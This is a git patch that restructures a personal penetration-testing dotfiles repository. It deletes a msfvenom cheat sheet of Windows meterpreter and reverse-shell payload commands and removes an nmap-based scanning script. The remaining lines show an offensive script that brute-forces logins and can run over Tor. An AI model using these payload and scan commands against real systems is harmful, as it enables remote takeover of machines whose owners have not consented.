From e6f25d16fe5469f36891a9b5790a47623945c2a0 Mon Sep 17 00:00:00 2001 From: 51x Date: Fri, 13 Jan 2017 22:48:07 +0100 Subject: [PATCH] reconsidering structure --- chaosdir/halp/note_example.txt | 11 ---- .../.zsh/pentest_agro_standalone.zsh | 0 .../.zsh/pentest_chaosfile_only_EXAMPLES.zsh | 52 +------------------ 3 files changed, 1 insertion(+), 62 deletions(-) delete mode 100755 chaosdir/halp/note_example.txt rename chaosdir/agro.zsh => profile_files/.zsh/pentest_agro_standalone.zsh (100%) rename chaosdir/chaosfunction.zsh => profile_files/.zsh/pentest_chaosfile_only_EXAMPLES.zsh (72%) diff --git a/chaosdir/halp/note_example.txt b/chaosdir/halp/note_example.txt deleted file mode 100755 index 79060ba..0000000 --- a/chaosdir/halp/note_example.txt +++ /dev/null @@ -1,11 +0,0 @@ -C0nn3ctz shell meterpreter windows - -c00nt3nt - -Windows msfvenom cheat sheet -msfvenom -p windows/meterpreter/reverse_tcp LHOST=$theip LPORT=$theport -f exe > shell.exe -msfvenom -a x86 --platform windows -p windows/shell/reverse_tcp LHOST=$theip LPORT=$theport -f exe -o shell.exe # STAGED, use this with msf -msfvenom -a x86 -p windows/shell_reverse_tcp LHOST=$theip LPORT=$theport -f exe -o shell.exe # NON-STAGED -msfvenom -p windows/x64/exec cmd="cmd /c calc.exe" -f dll > d3d9.dll -msfvenom -p windows/exec CMD="cmd /c calc.exe" -f dll > d3d9.dll -msfvenom -p cmd/windows/powershell_reverse_tcp LHOST=$theip LPORT=$theport diff --git a/chaosdir/agro.zsh b/profile_files/.zsh/pentest_agro_standalone.zsh similarity index 100% rename from chaosdir/agro.zsh rename to profile_files/.zsh/pentest_agro_standalone.zsh diff --git a/chaosdir/chaosfunction.zsh b/profile_files/.zsh/pentest_chaosfile_only_EXAMPLES.zsh similarity index 72% rename from chaosdir/chaosfunction.zsh rename to profile_files/.zsh/pentest_chaosfile_only_EXAMPLES.zsh index e58a1b6..a32a398 100755 --- a/chaosdir/chaosfunction.zsh +++ b/profile_files/.zsh/pentest_chaosfile_only_EXAMPLES.zsh @@ -1,51 +1,5 @@ #!/bin/zsh -# Agro scanner standalone -# License: GNU GPL v3, see LICENSE file -# Creation date: 2017.01.10. 21:30 -# Dependencies: apt update && apt install zsh nmap python2.7 libxml2-utils -y -# Dependencies for offensive part: apt install theharvester nmap fierce dnsrecon dnsutils hydra dirb sqlmap wget dirb curl nikto libxml2-utils whatweb -# Requires root, sry. - -# Variables -targetx=(127.0.0.1) # Space delimited! -ports=(21-23,25-26,53,80-81,110-111,113,135,139,143,179,199,443,445,465,514-515,548,554,587,646,993,995,1025-1027,1433,1720,1723,2000-2001,3306,3389,4443,5060,5666,5900,6001,8000,8008,8080,8443,8888,10000,32768,49152,49154,11211) - -# Initialize directory and naming structure -cdate=$(date +"%Y-%m-%d") -mkdir -p result-$cdate -cd result-$cdate -touch scan_history.txt -echo "---- Starting AgroScanner ----" >> scan_history.txt - -# Start with standard alive scan and check ports on alive hosts - -# Get alive hosts -echo $(date +"%Y-%m-%d-%H-%M-%S") " Starting alive hosts scan." >> scan_history.txt -nmap --randomize-hosts -sn -PS$ports $targetx -oG 1_alive_hosts.out -alive_hosts=$(grep "Status: Up" 1_alive_hosts.out | cut -d' ' -f2 | tr '\r\n' ' ') -echo $(date +"%Y-%m-%d-%H-%M-%S") " Finished alive hosts scan. Found hosts: " $alive_hosts >> scan_history.txt - -# Port scanning on alive hosts and version detection -echo $(date +"%Y-%m-%d-%H-%M-%S") " Starting port scans on alive hosts with top 1000." >> scan_history.txt -nmap --randomize-hosts -sS -sV -n -Pn --top-ports 1000 $targetx > 2_ports_and_service_top1000_on_alive_hosts.out -python ../agro_detection_parser.py | sed -n '/ /s/ \+/ /gp' > 3_ip_port_service.out -number_open_tcp_ports=$(grep -v "Nmap scan report for" 3_ip_port_service.out |wc -l) # It lists all ports, even unknown and faster to grep from here for this. -echo $(date +"%Y-%m-%d-%H-%M-%S") " Finished port scans on alive hosts with top 1000. Number of open ports: " $number_open_tcp_ports >> scan_history.txt - -# Run UDP scan on most common ports -echo $(date +"%Y-%m-%d-%H-%M-%S") " Starting UDP scans." >> scan_history.txt -nmap -sU --top-ports 50 $targetx > 4_udpscan.out -number_open_udp_ports=$(grep "open" 4_udpscan.out |wc -l) -echo $(date +"%Y-%m-%d-%H-%M-%S") " Finished UDP scans. Number of open UDP ports: " $number_open_udp_ports >> scan_history.txt - -# Vulnerability scanning -echo $(date +"%Y-%m-%d-%H-%M-%S") " Starting simple vulnerbility scans." >> scan_history.txt -nmap -n -p 21 --script=ftp-anon.nse $targetx > 5_nmap_script_ftpanon.txt -#nmap -sU -sS --script smb-enum-* -p U:137,T:139 $targetx > 6_nmap_sbm_nse_scan.txt # There is issue with the * askterisk... should be escaped or something -nmap -sS -n -p $ports --script=default,safe,vuln $targetx > 7_nmap_script_default-safe-vuln_scan.txt -echo $(date +"%Y-%m-%d-%H-%M-%S") " Finished vulnerability scans. Lists are in the relevant txt files." >> scan_history.txt - - +# This file contains ideas/notes/examples to be added to the main pentest zsh file. # Offensive part echo "Usage $0 domain.com [tor] [user wordlist] [password wordlist] [nessusURL:port] [nessususer] [nessuspassword]" @@ -57,10 +11,6 @@ echo "Usage $0 domain.com [tor] [user wordlist] [password wordlist] [nessusURL:p echo "[DEBUG] number of arguments $#" -# torify everything on demand -if [ $2 == "tor" ]; then echo "TOR mode ON" && torrequested=true; fi - - # VARIABLES currentdir=$(pwd) # hydra protocol not bruted by nmap